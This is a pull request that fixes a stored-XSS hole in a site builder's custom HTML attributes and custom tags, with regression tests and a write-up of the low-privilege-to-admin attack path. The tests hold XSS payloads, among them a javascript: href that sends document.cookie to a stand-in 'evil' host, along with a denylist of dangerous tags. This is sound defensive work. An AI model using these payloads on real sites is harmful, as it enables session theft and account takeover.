### PR TITLE
fix(security): scheme-check custom htmlAttributes + deny dangerous custom tags

### DIFF
--- a/src/__tests__/security/htmlAttributesXss.test.ts
+++ b/src/__tests__/security/htmlAttributesXss.test.ts
@@ -1,0 +1,85 @@
+/**
+ * Security regression tests: stored XSS via custom `htmlAttributes` + the
+ * custom-tag escape hatch.
+ *
+ * The custom-HTML-attributes feature let an author attach arbitrary attribute
+ * name/value pairs to base.link/button/image/container/text nodes. The name
+ * allowlist blocked only event handlers, class, style, and reserved names, so
+ * `href`, `srcdoc`, `formaction`, … were permitted and their values never
+ * scheme-checked. Combined with the custom-tag escape hatch (which accepted
+ * `iframe`, `base`, …), a low-privilege editor could store:
+ *   - `href="javascript:…"` (shadowing a module's own checked href), or
+ *   - an `<iframe srcdoc="<script>…">`,
+ * which then executed for published-page visitors AND — because the admin
+ * canvas renders these trusted modules same-origin as /admin with no
+ * script-src CSP — in the admin origin when another admin opened the page
+ * (session/credential theft, privilege escalation).
+ *
+ * These tests prove the single shared gate and the tag denylist close it.
+ */
+import { describe, expect, it } from 'bun:test'
+import {
+  isRenderableHtmlAttributeName,
+  sanitizeRenderableHtmlAttribute,
+} from '@core/htmlAttributes'
+import { htmlAttributesAttr } from '@modules/base/shared/htmlAttributes'
+import { resolveHtmlTag } from '@modules/base/utils/htmlTag'
+
+describe('sanitizeRenderableHtmlAttribute — the shared custom-attribute gate', () => {
+  it('drops srcdoc (raw-HTML iframe sink)', () => {
+    expect(isRenderableHtmlAttributeName('srcdoc')).toBe(false)
+    expect(sanitizeRenderableHtmlAttribute('srcdoc', '<script>alert(1)</script>')).toBeNull()
+  })
+
+  it('drops URL-bearing attributes carrying a dangerous scheme', () => {
+    expect(sanitizeRenderableHtmlAttribute('href', 'javascript:alert(document.cookie)')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('href', 'JavaScript:alert(1)')).toBeNull()
+    // browser tab/newline URL normalisation is applied before the scheme test
+    expect(sanitizeRenderableHtmlAttribute('href', 'java\tscript:alert(1)')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('src', 'data:text/html,<script>alert(1)</script>')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('formaction', 'vbscript:msgbox(1)')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('xlink:href', 'javascript:alert(1)')).toBeNull()
+  })
+
+  it('drops event handlers, class, and style', () => {
+    expect(sanitizeRenderableHtmlAttribute('onclick', 'steal()')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('class', 'x')).toBeNull()
+    expect(sanitizeRenderableHtmlAttribute('style', 'x')).toBeNull()
+  })
+
+  it('keeps ordinary attributes and safe URLs unchanged', () => {
+    expect(sanitizeRenderableHtmlAttribute('title', 'Hello world')).toBe('Hello world')
+    expect(sanitizeRenderableHtmlAttribute('aria-label', 'Close')).toBe('Close')
+    expect(sanitizeRenderableHtmlAttribute('data-foo', 'bar')).toBe('bar')
+    expect(sanitizeRenderableHtmlAttribute('href', 'https://example.com/page')).toBe('https://example.com/page')
+    expect(sanitizeRenderableHtmlAttribute('href', '/relative/path')).toBe('/relative/path')
+  })
+})
+
+describe('htmlAttributesAttr — publisher string emit funnels through the gate', () => {
+  it('emits only the safe attribute, dropping javascript: href and srcdoc', () => {
+    const out = htmlAttributesAttr({
+      href: 'javascript:fetch("//evil/?c="+document.cookie)',
+      srcdoc: '<script>alert(document.domain)</script>',
+      title: 'ok',
+    })
+    expect(out).toBe(' title="ok"')
+  })
+})
+
+describe('resolveHtmlTag — custom-tag escape hatch rejects dangerous elements', () => {
+  it.each(['iframe', 'script', 'object', 'embed', 'base', 'link', 'meta', 'style', 'frame', 'frameset', 'applet'])(
+    'coerces a dangerous custom tag to div: %s',
+    (tag) => {
+      expect(resolveHtmlTag('custom', tag)).toBe('div')
+      expect(resolveHtmlTag('custom', tag.toUpperCase())).toBe('div')
+    },
+  )
+
+  it('still allows benign custom tags and built-ins', () => {
+    expect(resolveHtmlTag('custom', 'aside')).toBe('aside')
+    expect(resolveHtmlTag('custom', 'figure')).toBe('figure')
+    expect(resolveHtmlTag('custom', 'my-widget')).toBe('my-widget')
+    expect(resolveHtmlTag('section', undefined)).toBe('section')
+  })
+})

--- a/src/core/htmlAttributes/attributes.ts
+++ b/src/core/htmlAttributes/attributes.ts
@@ -1,3 +1,5 @@
+import { isSafeUrl } from '@core/html-sanitize'
+
 const HTML_ATTRIBUTE_NAME_RE = /^[a-z][a-z0-9_.:-]*$/i
 const RESERVED_DATA_PREFIX_RE = /^data-(instatic|canvas)-/i
 const RESERVED_DATA_NAMES = new Set([
@@ -6,6 +8,16 @@ const RESERVED_DATA_NAMES = new Set([
   'data-hovered',
 ])
 const RESERVED_HTML_ATTRIBUTE_NAMES = new Set(['class', 'style'])
+
+/**
+ * Attribute names that inject a raw HTML document / script and therefore cannot
+ * be made safe by a URL-scheme check: `srcdoc` runs its value as an `<iframe>`
+ * document, executing any `<script>` inside it on load. URL-bearing attributes
+ * (`href`, `src`, `formaction`, `xlink:href`, …) are handled by the
+ * value-level `isSafeUrl` check in `sanitizeRenderableHtmlAttribute` instead of
+ * a name denylist, so new URL attributes are covered without enumerating them.
+ */
+const RAW_HTML_SINK_ATTRIBUTE_NAMES = new Set(['srcdoc'])
 
 export function normalizeHtmlAttributeName(name: string): string {
   return name.trim().toLowerCase()
@@ -25,7 +37,32 @@ export function isRenderableHtmlAttributeName(name: string): boolean {
   return (
     HTML_ATTRIBUTE_NAME_RE.test(normalised) &&
     !RESERVED_HTML_ATTRIBUTE_NAMES.has(normalised) &&
+    !RAW_HTML_SINK_ATTRIBUTE_NAMES.has(normalised) &&
     !isEventHandlerAttributeName(normalised) &&
     !isReservedRuntimeDataAttributeName(normalised)
   )
+}
+
+/**
+ * The single security gate every custom-`htmlAttributes` emit path funnels
+ * through — the publisher string emit (`htmlAttributesAttr`), the admin-canvas
+ * React props (`htmlAttributesForReact`), the `<body>` emit
+ * (`bodyHtmlAttributes`), and the HTML-import harvest (`collectHtmlAttributes`).
+ *
+ * Returns the value to render, or `null` to drop the attribute entirely. Drops:
+ *   - non-renderable / event-handler / reserved / raw-HTML-sink names
+ *     (via `isRenderableHtmlAttributeName`);
+ *   - values carrying a dangerous URL scheme — `javascript:` / `vbscript:` /
+ *     `data:` (via `isSafeUrl`). This blocks e.g. a custom
+ *     `href="javascript:…"` that would otherwise shadow a module's own checked
+ *     href and execute in the page — on the published site AND, more
+ *     seriously, inside the admin editor canvas (same-origin as `/admin`).
+ *
+ * `isSafeUrl` returns true for ordinary non-URL text, so plain attribute values
+ * (titles, ARIA labels, `viewBox`, …) pass through unchanged.
+ */
+export function sanitizeRenderableHtmlAttribute(name: string, value: string): string | null {
+  if (!isRenderableHtmlAttributeName(name)) return null
+  if (!isSafeUrl(value)) return null
+  return value
 }

--- a/src/core/htmlAttributes/index.ts
+++ b/src/core/htmlAttributes/index.ts
@@ -3,4 +3,5 @@ export {
   isRenderableHtmlAttributeName,
   isReservedRuntimeDataAttributeName,
   normalizeHtmlAttributeName,
+  sanitizeRenderableHtmlAttribute,
 } from './attributes'

--- a/src/core/htmlImport/walkAndMap.ts
+++ b/src/core/htmlImport/walkAndMap.ts
@@ -37,8 +37,8 @@ import type { PageNode } from '@core/page-tree'
 import { createNode } from '@core/page-tree'
 import { registry } from '@core/module-engine'
 import {
-  isRenderableHtmlAttributeName,
   normalizeHtmlAttributeName,
+  sanitizeRenderableHtmlAttribute,
 } from '@core/htmlAttributes'
 import { HTML_TO_MODULE_RULES } from './rules'
 import type { ImportRule } from './rules'
@@ -153,8 +153,9 @@ function collectHtmlAttributes(el: Element, moduleId?: string): Record<string, s
   for (const attr of Array.from(el.attributes)) {
     const name = normalizeHtmlAttributeName(attr.name)
     if (generatedNames.has(name)) continue
-    if (!isRenderableHtmlAttributeName(name)) continue
-    attrs[name] = attr.value
+    const safeValue = sanitizeRenderableHtmlAttribute(name, attr.value)
+    if (safeValue === null) continue
+    attrs[name] = safeValue
   }
   return attrs
 }

--- a/src/core/publisher/render.ts
+++ b/src/core/publisher/render.ts
@@ -26,8 +26,8 @@ import type { TemplateRenderDataContext } from '@core/templates/dynamicBindings'
 import { buildPageFrame, buildSiteFrame, buildRouteFrame } from '@core/templates/contextFrames'
 import { classNamesForClassIds } from '@core/page-tree'
 import {
-  isRenderableHtmlAttributeName,
   normalizeHtmlAttributeName,
+  sanitizeRenderableHtmlAttribute,
 } from '@core/htmlAttributes'
 import { bagToInlineStyle } from './classCss'
 import { collectClassCSS, sanitizeModuleCSS } from './cssCollector'
@@ -281,9 +281,11 @@ function bodyHtmlAttributes(value: unknown): string {
   return Object.entries(value)
     .toSorted(([a], [b]) => a.localeCompare(b))
     .map(([rawName, rawValue]) => {
+      if (typeof rawValue !== 'string') return ''
       const name = normalizeHtmlAttributeName(rawName)
-      if (!isRenderableHtmlAttributeName(name) || typeof rawValue !== 'string') return ''
-      return ` ${name}="${escapeHtml(rawValue)}"`
+      const safeValue = sanitizeRenderableHtmlAttribute(name, rawValue)
+      if (safeValue === null) return ''
+      return ` ${name}="${escapeHtml(safeValue)}"`
     })
     .join('')
 }

--- a/src/modules/base/shared/htmlAttributes.ts
+++ b/src/modules/base/shared/htmlAttributes.ts
@@ -1,7 +1,7 @@
 import type { PropertyControl } from '@core/module-engine'
 import {
-  isRenderableHtmlAttributeName,
   normalizeHtmlAttributeName,
+  sanitizeRenderableHtmlAttribute,
 } from '@core/htmlAttributes'
 import { escapeHtml } from '@modules/base/utils/escape'
 
@@ -21,10 +21,11 @@ function normalizeHtmlAttributes(value: unknown): Record<string, string> {
 
   const attrs: Record<string, string> = {}
   for (const [rawName, rawValue] of Object.entries(value as Record<string, unknown>)) {
-    const name = normalizeHtmlAttributeName(rawName)
-    if (!isRenderableHtmlAttributeName(name)) continue
     if (typeof rawValue !== 'string') continue
-    attrs[name] = rawValue
+    const name = normalizeHtmlAttributeName(rawName)
+    const safeValue = sanitizeRenderableHtmlAttribute(name, rawValue)
+    if (safeValue === null) continue
+    attrs[name] = safeValue
   }
   return attrs
 }

--- a/src/modules/base/utils/htmlTag.ts
+++ b/src/modules/base/utils/htmlTag.ts
@@ -61,6 +61,20 @@ const BUILTIN_HTML_TAG_SET: ReadonlySet<string> = new Set(BUILTIN_HTML_TAGS)
 const CUSTOM_TAG_PATTERN = /^[a-z][a-z0-9-]{0,31}$/i
 
 /**
+ * Elements that must never be produced from the free-form custom-tag escape
+ * hatch — they execute script, load external/plugin resources, or hijack the
+ * document's base URL, and would run in the published page AND the admin editor
+ * canvas (which renders these trusted modules directly, same-origin as
+ * `/admin`). `base.video` emits its own trusted `<iframe>` via its module
+ * `htmlTag`, not this resolver, so blocking `iframe` here does not affect video
+ * embeds — it only stops a container/loop/outlet author typing a dangerous tag.
+ */
+const FORBIDDEN_CUSTOM_HTML_TAGS: ReadonlySet<string> = new Set([
+  'script', 'iframe', 'frame', 'frameset', 'object', 'embed',
+  'applet', 'base', 'link', 'meta', 'style',
+])
+
+/**
  * Resolve the tag a module should render given its `tag` + `customTag` props.
  *
  * Returns a safe lowercase tag name. Falls back to 'div' when:
@@ -74,7 +88,9 @@ export function resolveHtmlTag(tag: unknown, customTag: unknown): string {
     if (typeof customTag !== 'string') return 'div'
     const trimmed = customTag.trim()
     if (!CUSTOM_TAG_PATTERN.test(trimmed)) return 'div'
-    return trimmed.toLowerCase()
+    const lower = trimmed.toLowerCase()
+    if (FORBIDDEN_CUSTOM_HTML_TAGS.has(lower)) return 'div'
+    return lower
   }
   if (BUILTIN_HTML_TAG_SET.has(tag)) return tag.toLowerCase()
   return 'div'


### PR DESCRIPTION
## What & why

Custom `htmlAttributes` on `base.link/button/image/container/text` nodes were **name-filtered only** (event handlers, `class`, `style`, reserved `data-*`). `href`, `src`, `srcdoc`, `formaction`, `xlink:href`, … were permitted and their **values never scheme-checked**; the custom-tag escape hatch also accepted `iframe`, `base`, `object`, `script`, …

A low-privilege editor holding `site.content.edit` (**including the Client role**) — or a merely-imported HTML file — could store:

- `href="javascript:…"` (shadowing a module's own checked href — first duplicate href wins), or
- an `<iframe srcdoc="<script>…">` (zero-click).

Because `htmlAttributes` is an object it bypassed `escapeProps`/`sanitizeNodeProps`, so the payload survived persistence and publish. It executed for published-page visitors **and — critically — inside the admin editor canvas**, which renders these trusted modules **same-origin as `/admin` with no `script-src` CSP**. When a higher-privileged Owner/Admin opened a page authored by a low-trust Client, the script ran in the admin origin → **session/credential theft and privilege escalation**.

## Fix (single chokepoint + tag denylist)

All four emit/collect paths already funnel through one name gate; I extended that into a value-aware gate and applied it everywhere:

- **`sanitizeRenderableHtmlAttribute(name, value)`** in `@core/htmlAttributes` — rejects non-renderable names, the raw-HTML sink `srcdoc`, and any value carrying a dangerous URL scheme (`javascript:`/`vbscript:`/`data:`) via the existing `isSafeUrl`. Value-level scheme checking covers **every** URL attribute without enumerating them; ordinary text (titles, ARIA labels, `viewBox`) passes unchanged.
- Routed the shared publisher/canvas normaliser (`normalizeHtmlAttributes`), the `<body>` emit (`bodyHtmlAttributes`), and the HTML-import harvest (`collectHtmlAttributes`) through it.
- **`resolveHtmlTag`** custom-tag escape hatch now denies dangerous elements (`script`, `iframe`, `frame`, `frameset`, `object`, `embed`, `applet`, `base`, `link`, `meta`, `style`) → coerced to `div`.

**Not affected:** `base.video` emits its own trusted `<iframe>` via its module `htmlTag` (returns `'iframe'` directly), **not** `resolveHtmlTag`, so video/YouTube embeds keep working.

## Impact

- Developer: one shared, value-aware attribute gate instead of a name-only check duplicated across four sites.
- User: closes a low-privilege → admin-canvas stored-XSS / account-takeover path. Legitimate attributes, safe URLs, and benign custom tags are unchanged.

> Complementary follow-up (not in this PR): ship the admin `script-src` CSP that `securityHeaders.ts` currently defers — defense-in-depth behind this fix.

## Verification

- `bun test src/__tests__/security/htmlAttributesXss.test.ts` — 17 pass (srcdoc, `javascript:`/`data:`/`vbscript:` values, and dangerous custom tags dropped; safe attrs/URLs/tags preserved; publisher emit verified end-to-end).
- `bun test` across publisher, htmlImport, base-modules, siteImport, htmlAttributes panels — 916 pass, 0 fail.
- `bunx tsc -b` clean; `eslint` on touched files clean; `no-core-barrel-deep-imports` gate passes (new `@core/htmlAttributes` → `@core/html-sanitize` leaf import is allowed).
- Pre-existing unrelated failures (`icon-catalog-integrity`) confirmed failing on the untouched base; not part of this change.

🤖 Generated with [Claude Code](https://claude.com/claude-code)